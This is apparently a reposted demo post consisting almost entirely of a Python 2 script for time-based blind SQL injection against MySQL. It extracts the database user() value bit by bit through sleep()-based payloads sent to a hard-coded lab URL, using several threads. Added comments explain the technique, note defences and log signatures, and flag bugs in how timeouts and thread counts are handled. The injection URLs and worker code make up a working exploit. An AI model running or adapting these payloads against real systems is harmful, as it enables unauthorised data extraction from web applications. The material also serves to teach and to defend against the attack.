python blind_injection.py demo for mysql

来源:转载

之前某人分享过判断二进制0/1来盲注,现在用python写了个demo

# Time-based blind SQL injection demo against a MySQL-backed test page, as
# posted. Every HTTP request asks the database one yes/no question ("is bit N
# of this byte set?"); the answer is read from whether the response arrives
# before the client-side timeout, because the injected `sleep(2)` only runs
# when the tested bit is 1.
#
# Python 2 only: `print` statements, `except Exception ,e`, urllib2.
# The target host and page are hard-coded in the two URL strings below.
#
# Defender's view: parameterized queries remove the injection entirely; in web
# logs this traffic is a burst of requests to one endpoint whose query string
# carries sleep()/lpad(bin(...)), with response times clustering at the sleep
# value or the client timeout.
import urllib
import urllib2
import time
import threading


class blind_injection:
    """Recover the value of MySQL `user()` one bit at a time over HTTP.

    Shared state written by worker threads:
      res          -- bits of the 8-bit length, keyed '1'..'8' (MSB first)
      resdata      -- bits of the byte currently being recovered, same keys
      thread_count -- outstanding workers, decremented under `lock`
    The result-dict writes themselves are not locked; each worker writes a
    distinct key.
    """

    def __init__(self,thread_num):
        # thread_num workers are launched per byte; thread_count is the
        # countdown the main thread busy-waits on.
        self.thread_count=self.thread_num=thread_num
        self.lock=threading.Lock()
        self.res={}
        self.resdata={}
        self.tmp=''

    def _request(self,URL):
        """GET `URL` with a browser-like User-Agent and a 2 s timeout.

        Returns the response body, or the literal string 'timeout' on ANY
        exception (connection refused, DNS failure, HTTP error ...), so any
        network fault is later misread as a 1 bit.
        """
        user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
        req = urllib2.Request(URL, None, user_agent)
        try:
            # timeout=2 equals the injected sleep(2): a genuinely slow but
            # non-sleeping response is indistinguishable from a 1 bit.
            request=urllib2.urlopen(req,timeout=2)
        except Exception ,e:
            #time.sleep(0.01)
            return 'timeout'
        return request.read()

    def bin2dec(self,string_num):
        """Parse a string of '0'/'1' characters as a base-2 integer."""
        return int(string_num,2)

    def _getlength(self,ii):
        """Worker: resolve bit `ii+1` (1-based, MSB first) of length(user()).

        The query pads bin(length(user())) to 8 digits and sleeps when the
        selected digit is 1; a client timeout therefore means bit = 1.
        """
        # thread_id is computed but never used.
        thread_id=int(threading.currentThread().getName())
        ii=ii+1
        url="http://10.211.55.20/testmysql.php?test=1'%20and%20if(mid(lpad(bin(length(user())),8,0),"+str(ii)+",1)=1,sleep(2),0)%23"
        html=self._request(url)
        #print html
        verify = 'timeout'
        if verify not in html:
            self.res[str(ii)] = 0
        else:
            self.res[str(ii)] = 1
        # Only the shared counter is guarded; the dict write above is per-key.
        self.lock.acquire()
        self.thread_count-=1
        self.lock.release()

    def _getdata(self,j,x):
        """Worker: resolve bit `j` (1-based, MSB first) of character `x` of user().

        Same oracle as _getlength, applied to lpad(bin(ord(mid(user(), x, 1))), 8, 0).
        """
        url="http://10.211.55.20/testmysql.php?test=1'%20and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
        html=self._request(url)
        #print url
        #print html
        verify = 'timeout'
        if verify not in html:
            self.resdata[str(j)] = 0
        else:
            self.resdata[str(j)] = 1
        self.lock.acquire()
        self.thread_count-=1
        self.lock.release()

    def _getstep(self):
        """Recover every character of user(), one byte per round.

        For each position x, launch one worker per bit, busy-wait until all
        have decremented thread_count, then reassemble bits '1'..'8' into a
        byte and append it to self.data.

        NOTE(review): thread_count is reset to the literal 8 and the bits are
        read as '1'..'8' regardless of thread_num, so with thread_num != 8 the
        wait loop and the reassembly disagree with the number of workers
        actually launched.
        """
        self.data=''
        for x in range(self.datalength):
            x=x+1
            self.thread_count=8
            self.tmp=''
            for j in range(self.thread_num):
                j=j+1
                t=threading.Thread(target=self._getdata,name=str(j),args=(j,x))
                t.setDaemon(True)
                t.start()
            # Poll every 10 ms until all workers of this round have finished.
            while self.thread_count>0:
                time.sleep(0.01)
            for i in range(8):
                self.tmp=self.tmp+str(self.resdata[str(i+1)])
            self.data=self.data+chr(self.bin2dec(self.tmp))
            print self.data

    def run(self):
        """Resolve the 8-bit length of user() first, then the data bytes.

        Workers are named '0'..'thread_num-1'; each resolves bit i+1. The
        main thread busy-waits on thread_count exactly as in _getstep.
        """
        for i in range(self.thread_num):
            t=threading.Thread(target=self._getlength,name=str(i),args=(i,))
            t.setDaemon(True)
            t.start()
        while self.thread_count>0:
            time.sleep(0.01)
        # self.tmp is assumed empty here (set in __init__); the length bits
        # are concatenated MSB first.
        for i in range(8):
            self.tmp = self.tmp + str(self.res[str(i+1)])
        self.datalength=self.bin2dec(self.tmp)
        print 'length:'+ str(self.datalength)
        self._getstep()

if __name__=='__main__':
    d=blind_injection(thread_num=8)
    d.run()

